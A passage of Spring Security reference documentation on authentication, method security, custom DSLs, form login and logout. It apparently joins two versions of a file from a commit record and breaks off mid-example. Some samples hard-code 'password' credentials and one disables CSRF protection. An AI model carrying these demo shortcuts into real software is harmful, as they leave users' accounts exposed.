\n[[oauth2resourceserver-claimsetmapping-add]]\n==== Adding a Claim\n\n`MappedJwtClaimSetConverter` can also be used to add a custom claim, for example, to adapt to an existing system:\n\n```java\nMappedJwtClaimSetConverter.withDefaults(Collections.singletonMap(\"custom\", custom -> \"value\"));\n```\n\n[[oauth2resourceserver-claimsetmapping-remove]]\n==== Removing a Claim\n\nAnd removing a claim is also simple, using the same API:\n\n```java\nMappedJwtClaimSetConverter.withDefaults(Collections.singletonMap(\"legacyclaim\", legacy -> null));\n```\n\n[[oauth2resourceserver-claimsetmapping-rename]]\n==== Renaming a Claim\n\nIn more sophisticated scenarios, like consulting multiple claims at once or renaming a claim, Resource Server accepts any class that implements `Converter<Map<String, Object>, Map<String,Object>>`:\n\n```java\npublic class UsernameSubClaimAdapter implements Converter<Map<String, Object>, Map<String, Object>> {\n private final MappedJwtClaimSetConverter delegate =\n MappedJwtClaimSetConverter.withDefaults(Collections.emptyMap());\n\n public Map<String, Object> convert(Map<String, Object> claims) {\n Map<String, Object> convertedClaims = this.delegate.convert(claims);\n\n String username = (String) convertedClaims.get(\"user_name\");\n convertedClaims.put(\"sub\", username);\n\n return convertedClaims;\n }\n}\n```\n\nAnd then, the instance can be supplied as normal:\n\n```java\n@Bean\nJwtDecoder jwtDecoder() {\n NimbusJwtDecoder jwtDecoder = new NimbusJwtDecoder(JwtProcessors.withJwkSetUri(jwkSetUri).build());\n jwtDecoder.setClaimSetConverter(new UsernameSubClaimAdapter());\n return jwtDecoder;\n}\n```\n\n[[oauth2resourceserver-timeouts]]\n=== Configuring Timeouts\n\nBy default, Resource Server uses connection and socket timeouts of 30 seconds each for coordinating with the authorization server.\n\nThis may be too short in some scenarios.\nFurther, it doesn't take into account more sophisticated patterns like back-off and discovery.\n\nTo adjust the way in which Resource Server connects to the authorization server, `NimbusJwtDecoder` accepts an instance of `RestOperations`:\n\n```java\n@Bean\npublic JwtDecoder jwtDecoder(RestTemplateBuilder builder) {\n RestOperations rest = builder\n .setConnectTimeout(60000)\n .setReadTimeout(60000)\n .build();\n\n NimbusJwtDecoder jwtDecoder = new NimbusJwtDecoder(JwtProcessors.withJwkSetUri(jwkSetUri).restOperations(rest).build());\n return jwtDecoder;\n}\n```\n\n[[jc-authentication]]\n== Authentication\n\nThus far we have only taken a look at the most basic authentication configuration.\nLet's take a look at a few slightly more advanced options for configuring authentication.\n\n[[jc-authentication-inmemory]]\n=== In-Memory Authentication\n\nWe have already seen an example of configuring in-memory authentication for a single user.\nBelow is an example to configure multiple users:\n\n[source,java]\n----\n@Bean\npublic UserDetailsService userDetailsService() throws Exception {\n\t\/\/ ensure the passwords are encoded properly\n\tUserBuilder users = User.withDefaultPasswordEncoder();\n\tInMemoryUserDetailsManager manager = new InMemoryUserDetailsManager();\n\tmanager.createUser(users.username(\"user\").password(\"password\").roles(\"USER\").build());\n\tmanager.createUser(users.username(\"admin\").password(\"password\").roles(\"USER\",\"ADMIN\").build());\n\treturn manager;\n}\n----\n\n[[jc-authentication-jdbc]]\n=== JDBC Authentication\n\nThe configuration below adds support for JDBC based authentication.\nThe example below assumes that you have already defined a `DataSource` within your application.\nThe 
https:\/\/github.com\/spring-projects\/spring-security\/tree\/master\/samples\/javaconfig\/jdbc[jdbc-javaconfig] sample provides a complete example of using JDBC based authentication.\n\n[source,java]\n----\n@Autowired\nprivate DataSource dataSource;\n\n@Autowired\npublic void configureGlobal(AuthenticationManagerBuilder auth) throws Exception {\n\t\/\/ ensure the passwords are encoded properly\n\tUserBuilder users = User.withDefaultPasswordEncoder();\n\tauth\n\t\t.jdbcAuthentication()\n\t\t\t.dataSource(dataSource)\n\t\t\t.withDefaultSchema()\n\t\t\t.withUser(users.username(\"user\").password(\"password\").roles(\"USER\"))\n\t\t\t.withUser(users.username(\"admin\").password(\"password\").roles(\"USER\",\"ADMIN\"));\n}\n----\n\n=== LDAP Authentication\n\nThe configuration below adds support for LDAP based authentication.\nThe https:\/\/github.com\/spring-projects\/spring-security\/tree\/master\/samples\/javaconfig\/ldap[ldap-javaconfig] sample provides a complete example of using LDAP based authentication.\n\n[source,java]\n----\n@Autowired\nprivate DataSource dataSource;\n\n@Autowired\npublic void configureGlobal(AuthenticationManagerBuilder auth) throws Exception {\n\tauth\n\t\t.ldapAuthentication()\n\t\t\t.userDnPatterns(\"uid={0},ou=people\")\n\t\t\t.groupSearchBase(\"ou=groups\");\n}\n----\n\nThe example above uses the following LDIF and an embedded Apache DS LDAP instance.\n\n.users.ldif\n----\ndn: ou=groups,dc=springframework,dc=org\nobjectclass: top\nobjectclass: organizationalUnit\nou: groups\n\ndn: ou=people,dc=springframework,dc=org\nobjectclass: top\nobjectclass: organizationalUnit\nou: people\n\ndn: uid=admin,ou=people,dc=springframework,dc=org\nobjectclass: top\nobjectclass: person\nobjectclass: organizationalPerson\nobjectclass: inetOrgPerson\ncn: Rod Johnson\nsn: Johnson\nuid: admin\nuserPassword: password\n\ndn: uid=user,ou=people,dc=springframework,dc=org\nobjectclass: top\nobjectclass: person\nobjectclass: organizationalPerson\nobjectclass: inetOrgPerson\ncn: Dianne Emu\nsn: Emu\nuid: user\nuserPassword: password\n\ndn: cn=user,ou=groups,dc=springframework,dc=org\nobjectclass: top\nobjectclass: groupOfNames\ncn: user\nuniqueMember: uid=admin,ou=people,dc=springframework,dc=org\nuniqueMember: uid=user,ou=people,dc=springframework,dc=org\n\ndn: cn=admin,ou=groups,dc=springframework,dc=org\nobjectclass: top\nobjectclass: groupOfNames\ncn: admin\nuniqueMember: uid=admin,ou=people,dc=springframework,dc=org\n----\n\n[[jc-authentication-authenticationprovider]]\n=== AuthenticationProvider\n\nYou can define custom authentication by exposing a custom `AuthenticationProvider` as a bean.\nFor example, the following will customize authentication assuming that `SpringAuthenticationProvider` implements `AuthenticationProvider`:\n\nNOTE: This is only used if the `AuthenticationManagerBuilder` has not been populated\n\n[source,java]\n----\n@Bean\npublic SpringAuthenticationProvider springAuthenticationProvider() {\n\treturn new SpringAuthenticationProvider();\n}\n----\n
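\nA minimal sketch of such a provider is shown below; the hard-coded credential check is purely illustrative, and a real implementation would verify the credentials against a backing store:\n\n[source,java]\n----\npublic class SpringAuthenticationProvider implements AuthenticationProvider {\n\n\t@Override\n\tpublic Authentication authenticate(Authentication authentication) throws AuthenticationException {\n\t\tString username = authentication.getName();\n\t\tString password = (String) authentication.getCredentials();\n\t\t\/\/ illustrative only: validate the credentials against your own store here\n\t\tif (!\"user\".equals(username) || !\"password\".equals(password)) {\n\t\t\tthrow new BadCredentialsException(\"Invalid username or password\");\n\t\t}\n\t\treturn new UsernamePasswordAuthenticationToken(\n\t\t\t\tusername, password, AuthorityUtils.createAuthorityList(\"ROLE_USER\"));\n\t}\n\n\t@Override\n\tpublic boolean supports(Class<?> authentication) {\n\t\treturn UsernamePasswordAuthenticationToken.class.isAssignableFrom(authentication);\n\t}\n}\n----\n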
\n[[jc-authentication-userdetailsservice]]\n=== UserDetailsService\n\nYou can define custom authentication by exposing a custom `UserDetailsService` as a bean.\nFor example, the following will customize authentication assuming that `SpringDataUserDetailsService` implements `UserDetailsService`:\n\nNOTE: This is only used if the `AuthenticationManagerBuilder` has not been populated and no `AuthenticationProvider` bean is defined.\n\n[source,java]\n----\n@Bean\npublic SpringDataUserDetailsService springDataUserDetailsService() {\n\treturn new SpringDataUserDetailsService();\n}\n----\n\nYou can also customize how passwords are encoded by exposing a `PasswordEncoder` as a bean.\nFor example, if you use bcrypt you can add a bean definition as shown below:\n\n[source,java]\n----\n@Bean\npublic BCryptPasswordEncoder passwordEncoder() {\n\treturn new BCryptPasswordEncoder();\n}\n----\n\n== Multiple HttpSecurity\n\nWe can configure multiple HttpSecurity instances just as we can have multiple `<http>` blocks.\nThe key is to extend the `WebSecurityConfigurerAdapter` multiple times.\nFor example, the following is an example of having a different configuration for URLs that start with `\/api\/`.\n\n[source,java]\n----\n@EnableWebSecurity\npublic class MultiHttpSecurityConfig {\n\t@Bean <1>\n\tpublic UserDetailsService userDetailsService() throws Exception {\n\t\t\/\/ ensure the passwords are encoded properly\n\t\tUserBuilder users = User.withDefaultPasswordEncoder();\n\t\tInMemoryUserDetailsManager manager = new InMemoryUserDetailsManager();\n\t\tmanager.createUser(users.username(\"user\").password(\"password\").roles(\"USER\").build());\n\t\tmanager.createUser(users.username(\"admin\").password(\"password\").roles(\"USER\",\"ADMIN\").build());\n\t\treturn manager;\n\t}\n\n\t@Configuration\n\t@Order(1) <2>\n\tpublic static class ApiWebSecurityConfigurationAdapter extends WebSecurityConfigurerAdapter {\n\t\tprotected void configure(HttpSecurity http) throws Exception {\n\t\t\thttp\n\t\t\t\t.antMatcher(\"\/api\/**\") <3>\n\t\t\t\t.authorizeRequests(authorizeRequests ->\n\t\t\t\t authorizeRequests\n\t\t\t\t\t .anyRequest().hasRole(\"ADMIN\")\n\t\t\t )\n\t\t\t\t.httpBasic(withDefaults());\n\t\t}\n\t}\n\n\t@Configuration <4>\n\tpublic static class FormLoginWebSecurityConfigurerAdapter extends WebSecurityConfigurerAdapter {\n\n\t\t@Override\n\t\tprotected void configure(HttpSecurity http) throws Exception {\n\t\t\thttp\n\t\t\t\t.authorizeRequests(authorizeRequests ->\n\t\t\t\t authorizeRequests\n\t\t\t\t\t .anyRequest().authenticated()\n\t\t\t\t)\n\t\t\t\t.formLogin(withDefaults());\n\t\t}\n\t}\n}\n----\n\n<1> Configure Authentication as normal\n<2> Create an instance of `WebSecurityConfigurerAdapter` that contains `@Order` to specify which `WebSecurityConfigurerAdapter` should be considered first.\n<3> The `http.antMatcher` states that this `HttpSecurity` will only be applicable to URLs that start with `\/api\/`\n<4> Create another instance of `WebSecurityConfigurerAdapter`.\nIf the URL does not start with `\/api\/` this configuration will be used.\nThis configuration is considered after `ApiWebSecurityConfigurationAdapter` since it has an `@Order` value after `1` (no `@Order` defaults to last).\n\n\n[[jc-method]]\n== Method Security\n\nFrom version 2.0 onwards Spring Security has improved support substantially for adding security to your service layer methods.\nIt provides support for JSR-250 annotation security as well as the framework's original `@Secured` annotation.\nFrom 3.0 you can also make use of new <<el-access,expression-based annotations>>.\nYou can apply security to a single bean, using the `intercept-methods` element to decorate the bean declaration, or you can secure multiple beans across the entire service layer using the AspectJ style pointcuts.\n\n=== EnableGlobalMethodSecurity\n\nWe can enable annotation-based security using the `@EnableGlobalMethodSecurity` annotation on any `@Configuration` instance.\nFor example, the following would enable Spring Security's `@Secured` 
annotation.\n\n[source,java]\n----\n@EnableGlobalMethodSecurity(securedEnabled = true)\npublic class MethodSecurityConfig {\n\/\/ ...\n}\n----\n\nAdding an annotation to a method (on a class or interface) would then limit the access to that method accordingly.\nSpring Security's native annotation support defines a set of attributes for the method.\nThese will be passed to the AccessDecisionManager for it to make the actual decision:\n\n[source,java]\n----\npublic interface BankService {\n\n@Secured(\"IS_AUTHENTICATED_ANONYMOUSLY\")\npublic Account readAccount(Long id);\n\n@Secured(\"IS_AUTHENTICATED_ANONYMOUSLY\")\npublic Account[] findAccounts();\n\n@Secured(\"ROLE_TELLER\")\npublic Account post(Account account, double amount);\n}\n----\n\nSupport for JSR-250 annotations can be enabled using\n\n[source,java]\n----\n@EnableGlobalMethodSecurity(jsr250Enabled = true)\npublic class MethodSecurityConfig {\n\/\/ ...\n}\n----\n\nThese are standards-based and allow simple role-based constraints to be applied but do not have the power of Spring Security's native annotations.\nTo use the new expression-based syntax, you would use\n\n[source,java]\n----\n@EnableGlobalMethodSecurity(prePostEnabled = true)\npublic class MethodSecurityConfig {\n\/\/ ...\n}\n----\n\nand the equivalent Java code would be\n\n[source,java]\n----\npublic interface BankService {\n\n@PreAuthorize(\"isAnonymous()\")\npublic Account readAccount(Long id);\n\n@PreAuthorize(\"isAnonymous()\")\npublic Account[] findAccounts();\n\n@PreAuthorize(\"hasAuthority('ROLE_TELLER')\")\npublic Account post(Account account, double amount);\n}\n----\n\n=== GlobalMethodSecurityConfiguration\n\nSometimes you may need to perform operations that are more complicated than the `@EnableGlobalMethodSecurity` annotation allows.\nFor these instances, you can extend the `GlobalMethodSecurityConfiguration`, ensuring that the `@EnableGlobalMethodSecurity` annotation is present on your subclass.\nFor example, if you wanted to provide a custom `MethodSecurityExpressionHandler`, you could use the following configuration:\n\n[source,java]\n----\n@EnableGlobalMethodSecurity(prePostEnabled = true)\npublic class MethodSecurityConfig extends GlobalMethodSecurityConfiguration {\n\t@Override\n\tprotected MethodSecurityExpressionHandler createExpressionHandler() {\n\t\t\/\/ ... create and return custom MethodSecurityExpressionHandler ...\n\t\treturn expressionHandler;\n\t}\n}\n----\n
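\nAs a concrete illustration, the sketch below returns Spring Security's `DefaultMethodSecurityExpressionHandler` configured with a custom `PermissionEvaluator`; the `CustomPermissionEvaluator` class is an assumption made for the sake of the example:\n\n[source,java]\n----\n@EnableGlobalMethodSecurity(prePostEnabled = true)\npublic class MethodSecurityConfig extends GlobalMethodSecurityConfiguration {\n\t@Override\n\tprotected MethodSecurityExpressionHandler createExpressionHandler() {\n\t\tDefaultMethodSecurityExpressionHandler expressionHandler =\n\t\t\t\tnew DefaultMethodSecurityExpressionHandler();\n\t\t\/\/ hasPermission(...) expressions now delegate to the custom evaluator\n\t\texpressionHandler.setPermissionEvaluator(new CustomPermissionEvaluator());\n\t\treturn expressionHandler;\n\t}\n}\n----\n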
\nFor additional information about methods that can be overridden, refer to the `GlobalMethodSecurityConfiguration` Javadoc.\n\n== Post Processing Configured Objects\n\nSpring Security's Java Configuration does not expose every property of every object that it configures.\nThis simplifies the configuration for a majority of users.\nAfter all, if every property was exposed, users could use standard bean configuration.\n\nWhile there are good reasons to not directly expose every property, users may still need more advanced configuration options.\nTo address this, Spring Security introduces the concept of an `ObjectPostProcessor` which can be used to modify or replace many of the Object instances created by the Java Configuration.\nFor example, if you wanted to configure the `filterSecurityPublishAuthorizationSuccess` property on `FilterSecurityInterceptor` you could use the following:\n\n[source,java]\n----\n@Override\nprotected void configure(HttpSecurity http) throws Exception {\n\thttp\n\t\t.authorizeRequests(authorizeRequests ->\n\t\t\tauthorizeRequests\n\t\t\t\t.anyRequest().authenticated()\n\t\t\t\t.withObjectPostProcessor(new ObjectPostProcessor<FilterSecurityInterceptor>() {\n\t\t\t\t\tpublic <O extends FilterSecurityInterceptor> O postProcess(\n\t\t\t\t\t\t\tO fsi) {\n\t\t\t\t\t\tfsi.setPublishAuthorizationSuccess(true);\n\t\t\t\t\t\treturn fsi;\n\t\t\t\t\t}\n\t\t\t\t})\n\t\t);\n}\n----\n\n[[jc-custom-dsls]]\n== Custom DSLs\n\nYou can provide your own custom DSLs in Spring Security.\nFor example, you might have something that looks like this:\n\n[source,java]\n----\npublic class MyCustomDsl extends AbstractHttpConfigurer<MyCustomDsl, HttpSecurity> {\n\tprivate boolean flag;\n\n\t@Override\n\tpublic void init(HttpSecurity http) throws Exception {\n\t\t\/\/ any method that adds another configurer\n\t\t\/\/ must be done in the init method\n\t\thttp.csrf().disable();\n\t}\n\n\t@Override\n\tpublic void configure(HttpSecurity http) throws Exception {\n\t\tApplicationContext context = http.getSharedObject(ApplicationContext.class);\n\n\t\t\/\/ here we look up from the ApplicationContext. 
You can also just create a new instance.\n\t\tMyFilter myFilter = context.getBean(MyFilter.class);\n\t\tmyFilter.setFlag(flag);\n\t\thttp.addFilterBefore(myFilter, UsernamePasswordAuthenticationFilter.class);\n\t}\n\n\tpublic MyCustomDsl flag(boolean value) {\n\t\tthis.flag = value;\n\t\treturn this;\n\t}\n\n\tpublic static MyCustomDsl customDsl() {\n\t\treturn new MyCustomDsl();\n\t}\n}\n----\n\nNOTE: This is actually how methods like `HttpSecurity.authorizeRequests()` are implemented.\n\nThe custom DSL can then be used like this:\n\n[source,java]\n----\n@EnableWebSecurity\npublic class Config extends WebSecurityConfigurerAdapter {\n\t@Override\n\tprotected void configure(HttpSecurity http) throws Exception {\n\t\thttp\n\t\t\t.apply(customDsl())\n\t\t\t\t.flag(true)\n\t\t\t\t.and()\n\t\t\t...;\n\t}\n}\n----\n\nThe code is invoked in the following order:\n\n* Code in `Config`s configure method is invoked\n* Code in `MyCustomDsl`s init method is invoked\n* Code in `MyCustomDsl`s configure method is invoked\n\nIf you want, you can have `WebSecurityConfigurerAdapter` add `MyCustomDsl` by default by using `SpringFactories`.\nFor example, you would create a resource on the classpath named `META-INF\/spring.factories` with the following contents:\n\n.META-INF\/spring.factories\n----\norg.springframework.security.config.annotation.web.configurers.AbstractHttpConfigurer = sample.MyCustomDsl\n----\n\nUsers wishing to disable the default can do so explicitly.\n\n[source,java]\n----\n@EnableWebSecurity\npublic class Config extends WebSecurityConfigurerAdapter {\n\t@Override\n\tprotected void configure(HttpSecurity http) throws Exception {\n\t\thttp\n\t\t\t.apply(customDsl()).disable()\n\t\t\t...;\n\t}\n}\n----\n","old_contents":"
InMemoryUserDetailsManager();\n\t\tmanager.createUser(User.withDefaultPasswordEncoder().username(\"user\").password(\"password\").roles(\"USER\").build());\n\t\treturn manager;\n\t}\n}\n----\n\nThere really isn't much to this configuration, but it does a lot.\nYou can find a summary of the features below:\n\n* Require authentication to every URL in your application\n* Generate a login form for you\n* Allow the user with the *Username* _user_ and the *Password* _password_ to authenticate with form based authentication\n* Allow the user to logout\n* https:\/\/en.wikipedia.org\/wiki\/Cross-site_request_forgery[CSRF attack] prevention\n* https:\/\/en.wikipedia.org\/wiki\/Session_fixation[Session Fixation] protection\n* Security Header integration\n** https:\/\/en.wikipedia.org\/wiki\/HTTP_Strict_Transport_Security[HTTP Strict Transport Security] for secure requests\n** https:\/\/msdn.microsoft.com\/en-us\/library\/ie\/gg622941(v=vs.85).aspx[X-Content-Type-Options] integration\n** Cache Control (can be overridden later by your application to allow caching of your static resources)\n** https:\/\/msdn.microsoft.com\/en-us\/library\/dd565647(v=vs.85).aspx[X-XSS-Protection] integration\n** X-Frame-Options integration to help prevent https:\/\/en.wikipedia.org\/wiki\/Clickjacking[Clickjacking]\n* Integrate with the following Servlet API methods\n** https:\/\/docs.oracle.com\/javaee\/6\/api\/javax\/servlet\/http\/HttpServletRequest.html#getRemoteUser()[HttpServletRequest#getRemoteUser()]\n** https:\/\/docs.oracle.com\/javaee\/6\/api\/javax\/servlet\/http\/HttpServletRequest.html#getUserPrincipal()[HttpServletRequest#getUserPrincipal()]\n** https:\/\/docs.oracle.com\/javaee\/6\/api\/javax\/servlet\/http\/HttpServletRequest.html#isUserInRole(java.lang.String)[HttpServletRequest#isUserInRole(java.lang.String)]\n** https:\/\/docs.oracle.com\/javaee\/6\/api\/javax\/servlet\/http\/HttpServletRequest.html#login(java.lang.String,%20java.lang.String)[HttpServletRequest#login(java.lang.String, java.lang.String)]\n** https:\/\/docs.oracle.com\/javaee\/6\/api\/javax\/servlet\/http\/HttpServletRequest.html#logout()[HttpServletRequest#logout()]\n\n=== AbstractSecurityWebApplicationInitializer\n\nThe next step is to register the `springSecurityFilterChain` with the war.\nThis can be done in Java Configuration with https:\/\/docs.spring.io\/spring\/docs\/3.2.x\/spring-framework-reference\/html\/mvc.html#mvc-container-config[Spring's WebApplicationInitializer support] in a Servlet 3.0+ environment.\nNot suprisingly, Spring Security provides a base class `AbstractSecurityWebApplicationInitializer` that will ensure the `springSecurityFilterChain` gets registered for you.\nThe way in which we use `AbstractSecurityWebApplicationInitializer` differs depending on if we are already using Spring or if Spring Security is the only Spring component in our application.\n\n* <<abstractsecuritywebapplicationinitializer-without-existing-spring>> - Use these instructions if you are not using Spring already\n* <<abstractsecuritywebapplicationinitializer-with-spring-mvc>> - Use these instructions if you are already using Spring\n\n=== AbstractSecurityWebApplicationInitializer without Existing Spring\n\nIf you are not using Spring or Spring MVC, you will need to pass in the `WebSecurityConfig` into the superclass to ensure the configuration is picked up.\nYou can find an example below:\n\n[source,java]\n----\nimport org.springframework.security.web.context.*;\n\npublic class SecurityWebApplicationInitializer\n\textends 
AbstractSecurityWebApplicationInitializer {\n\n\tpublic SecurityWebApplicationInitializer() {\n\t\tsuper(WebSecurityConfig.class);\n\t}\n}\n----\n\nThe `SecurityWebApplicationInitializer` will do the following things:\n\n* Automatically register the springSecurityFilterChain Filter for every URL in your application\n* Add a ContextLoaderListener that loads the <<jc-hello-wsca,WebSecurityConfig>>.\n\n=== AbstractSecurityWebApplicationInitializer with Spring MVC\n\nIf we were using Spring elsewhere in our application we probably already had a `WebApplicationInitializer` that is loading our Spring Configuration.\nIf we use the previous configuration we would get an error.\nInstead, we should register Spring Security with the existing `ApplicationContext`.\nFor example, if we were using Spring MVC our `SecurityWebApplicationInitializer` would look something like the following:\n\n[source,java]\n----\nimport org.springframework.security.web.context.*;\n\npublic class SecurityWebApplicationInitializer\n\textends AbstractSecurityWebApplicationInitializer {\n\n}\n----\n\nThis would simply only register the springSecurityFilterChain Filter for every URL in your application.\nAfter that we would ensure that `WebSecurityConfig` was loaded in our existing ApplicationInitializer.\nFor example, if we were using Spring MVC it would be added in the `getRootConfigClasses()`\n\n[[message-web-application-inititializer-java]]\n[source,java]\n----\npublic class MvcWebApplicationInitializer extends\n\t\tAbstractAnnotationConfigDispatcherServletInitializer {\n\n\t@Override\n\tprotected Class<?>[] getRootConfigClasses() {\n\t\treturn new Class[] { WebSecurityConfig.class };\n\t}\n\n\t\/\/ ... other overrides ...\n}\n----\n\n[[jc-httpsecurity]]\n== HttpSecurity\n\nThus far our <<jc-hello-wsca,WebSecurityConfig>> only contains information about how to authenticate our users.\nHow does Spring Security know that we want to require all users to be authenticated?\nHow does Spring Security know we want to support form based authentication?\nActually, there is an configuration class that is being invoked behind the scenes called `WebSecurityConfigurerAdapter`.\nIt has a method called `configure` with the following default implementation:\n\n[source,java]\n----\nprotected void configure(HttpSecurity http) throws Exception {\n\thttp\n\t\t.authorizeRequests(authorizeRequests ->\n\t\t authorizeRequests\n\t\t\t .anyRequest().authenticated()\n\t\t)\n\t\t.formLogin(withDefaults())\n\t\t.httpBasic(withDefaults());\n}\n----\n\nThe default configuration above:\n\n* Ensures that any request to our application requires the user to be authenticated\n* Allows users to authenticate with form based login\n* Allows users to authenticate with HTTP Basic authentication\n\nYou will notice that this configuration is quite similar the XML Namespace configuration:\n\n[source,xml]\n----\n<http>\n\t<intercept-url pattern=\"\/**\" access=\"authenticated\"\/>\n\t<form-login \/>\n\t<http-basic \/>\n<\/http>\n----\n\n[[jc-form]]\n== Java Configuration and Form Login\nYou might be wondering where the login form came from when you were prompted to log in, since we made no mention of any HTML files or JSPs.\nSince Spring Security's default configuration does not explicitly set a URL for the login page, Spring Security generates one automatically, based on the features that are enabled and using standard values for the URL which processes the submitted login, the default target URL the user will be sent to after logging in and so on.\n\nWhile the 
automatically generated log in page is convenient to get up and running quickly, most applications will want to provide their own login page.\nWhen we want to change the default configuration, we can customize the `WebSecurityConfigurerAdapter` that we mentioned earlier by extending it like so:\n\n[source,java]\n----\npublic class WebSecurityConfig extends WebSecurityConfigurerAdapter {\n\t\/\/ ...\n}\n----\n\nAnd then override the `configure` method as seen below:\n\n[source,java]\n----\nprotected void configure(HttpSecurity http) throws Exception {\n\thttp\n\t\t.authorizeRequests(authorizeRequests ->\n\t\t authorizeRequests\n\t\t\t .anyRequest().authenticated()\n\t\t)\n\t\t.formLogin(formLogin ->\n\t\t formLogin\n\t\t\t .loginPage(\"\/login\") \/\/ <1>\n\t\t\t .permitAll() \/\/ <2>\n\t );\n}\n----\n\n<1> The updated configuration specifies the location of the log in page.\n<2> We must grant all users (i.e. unauthenticated users) access to our log in page.\nThe `formLogin().permitAll()` method allows granting access to all users for all URLs associated with form based log in.\n\nAn example log in page implemented with JSPs for our current configuration can be seen below:\n\nNOTE: The login page below represents our current configuration.\nWe could easily update our configuration if some of the defaults do not meet our needs.\n\n[source,html]\n----\n<c:url value=\"\/login\" var=\"loginUrl\"\/>\n<form action=\"${loginUrl}\" method=\"post\"> <1>\n\t<c:if test=\"${param.error != null}\"> <2>\n\t\t<p>\n\t\t\tInvalid username and password.\n\t\t<\/p>\n\t<\/c:if>\n\t<c:if test=\"${param.logout != null}\"> <3>\n\t\t<p>\n\t\t\tYou have been logged out.\n\t\t<\/p>\n\t<\/c:if>\n\t<p>\n\t\t<label for=\"username\">Username<\/label>\n\t\t<input type=\"text\" id=\"username\" name=\"username\"\/>\t<4>\n\t<\/p>\n\t<p>\n\t\t<label for=\"password\">Password<\/label>\n\t\t<input type=\"password\" id=\"password\" name=\"password\"\/>\t<5>\n\t<\/p>\n\t<input type=\"hidden\" <6>\n\t\tname=\"${_csrf.parameterName}\"\n\t\tvalue=\"${_csrf.token}\"\/>\n\t<button type=\"submit\" class=\"btn\">Log in<\/button>\n<\/form>\n----\n\n<1> A POST to the `\/login` URL will attempt to authenticate the user\n<2> If the query parameter `error` exists, authentication was attempted and failed\n<3> If the query parameter `logout` exists, the user was successfully logged out\n<4> The username must be present as the HTTP parameter named __username__\n<5> The password must be present as the HTTP parameter named __password__\n<6> We must <<csrf-include-csrf-token>> To learn more read the <<csrf>> section of the reference\n\n[[jc-authorize-requests]]\n== Authorize Requests\nOur examples have only required users to be authenticated and have done so for every URL in our application.\nWe can specify custom requirements for our URLs by adding multiple children to our `http.authorizeRequests()` method.\nFor example:\n\n\n[source,java]\n----\nprotected void configure(HttpSecurity http) throws Exception {\n\thttp\n\t\t.authorizeRequests(authorizeRequests -> \/\/ <1>\n\t\t authorizeRequests\n\t\t\t .antMatchers(\"\/resources\/**\", \"\/signup\", \"\/about\").permitAll() \/\/ <2>\n\t\t\t .antMatchers(\"\/admin\/**\").hasRole(\"ADMIN\") \/\/ <3>\n\t\t\t .antMatchers(\"\/db\/**\").access(\"hasRole('ADMIN') and hasRole('DBA')\") \/\/ <4>\n\t\t\t .anyRequest().authenticated() \/\/ <5>\n\t\t)\n\t\t.formLogin(withDefaults());\n}\n----\n\n<1> There are multiple children to the `http.authorizeRequests()` method each matcher is considered in the order 
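If Spring MVC renders the custom log in page discussed above, one lightweight option is to map the `/login` URL to the view through a view controller. A minimal sketch, assuming a standard `WebMvcConfigurer` setup in which the view resolver maps the `login` view name to the JSP:

[source,java]
----
import org.springframework.context.annotation.Configuration;
import org.springframework.web.servlet.config.annotation.ViewControllerRegistry;
import org.springframework.web.servlet.config.annotation.WebMvcConfigurer;

@Configuration
public class WebMvcConfig implements WebMvcConfigurer {

	@Override
	public void addViewControllers(ViewControllerRegistry registry) {
		// serve the custom log in page without writing a dedicated controller
		registry.addViewController("/login").setViewName("login");
	}
}
----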
they were declared.\n<2> We specified multiple URL patterns that any user can access.\nSpecifically, any user can access a request if the URL starts with \"\/resources\/\", equals \"\/signup\", or equals \"\/about\".\n<3> Any URL that starts with \"\/admin\/\" will be restricted to users who have the role \"ROLE_ADMIN\".\nYou will notice that since we are invoking the `hasRole` method we do not need to specify the \"ROLE_\" prefix.\n<4> Any URL that starts with \"\/db\/\" requires the user to have both \"ROLE_ADMIN\" and \"ROLE_DBA\".\nYou will notice that since we are using the `hasRole` expression we do not need to specify the \"ROLE_\" prefix.\n<5> Any URL that has not already been matched on only requires that the user be authenticated\n\n[[jc-logout]]\n== Handling Logouts\n\nWhen using the `{security-api-url}org\/springframework\/security\/config\/annotation\/web\/configuration\/WebSecurityConfigurerAdapter.html[WebSecurityConfigurerAdapter]`, logout capabilities are automatically applied.\nThe default is that accessing the URL `\/logout` will log the user out by:\n\n- Invalidating the HTTP Session\n- Cleaning up any RememberMe authentication that was configured\n- Clearing the `SecurityContextHolder`\n- Redirect to `\/login?logout`\n\nSimilar to configuring login capabilities, however, you also have various options to further customize your logout requirements:\n\n[source,java]\n----\nprotected void configure(HttpSecurity http) throws Exception {\n\thttp\n\t\t.logout(logout -> \/\/ <1>\n\t\t logout\n\t\t\t .logoutUrl(\"\/my\/logout\") \/\/ <2>\n\t\t\t .logoutSuccessUrl(\"\/my\/index\") \/\/ <3>\n\t\t\t .logoutSuccessHandler(logoutSuccessHandler) \/\/ <4>\n\t\t\t .invalidateHttpSession(true) \/\/ <5>\n\t\t\t .addLogoutHandler(logoutHandler) \/\/ <6>\n\t\t\t .deleteCookies(cookieNamesToClear) \/\/ <7>\n\t\t)\n\t\t...\n}\n----\n\n<1> Provides logout support.\nThis is automatically applied when using `WebSecurityConfigurerAdapter`.\n<2> The URL that triggers log out to occur (default is `\/logout`).\nIf CSRF protection is enabled (default), then the request must also be a POST.\nFor more information, please consult the {security-api-url}org\/springframework\/security\/config\/annotation\/web\/configurers\/LogoutConfigurer.html#logoutUrl-java.lang.String-[JavaDoc].\n<3> The URL to redirect to after logout has occurred.\nThe default is `\/login?logout`.\nFor more information, please consult the {security-api-url}org\/springframework\/security\/config\/annotation\/web\/configurers\/LogoutConfigurer.html#logoutSuccessUrl-java.lang.String-[JavaDoc].\n<4> Let's you specify a custom `LogoutSuccessHandler`.\nIf this is specified, `logoutSuccessUrl()` is ignored.\nFor more information, please consult the {security-api-url}org\/springframework\/security\/config\/annotation\/web\/configurers\/LogoutConfigurer.html#logoutSuccessHandler-org.springframework.security.web.authentication.logout.LogoutSuccessHandler-[JavaDoc].\n<5> Specify whether to invalidate the `HttpSession` at the time of logout.\nThis is *true* by default.\nConfigures the `SecurityContextLogoutHandler` under the covers.\nFor more information, please consult the {security-api-url}org\/springframework\/security\/config\/annotation\/web\/configurers\/LogoutConfigurer.html#invalidateHttpSession-boolean-[JavaDoc].\n<6> Adds a `LogoutHandler`.\n`SecurityContextLogoutHandler` is added as the last `LogoutHandler` by default.\n<7> Allows specifying the names of cookies to be removed on logout success.\nThis is a shortcut for adding a 
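The `logoutSuccessHandler`, `logoutHandler` and `cookieNamesToClear` references in the logout example above are placeholders. Illustrative values, built from standard implementations that ship with Spring Security (the cookie names are application-specific assumptions):

[source,java]
----
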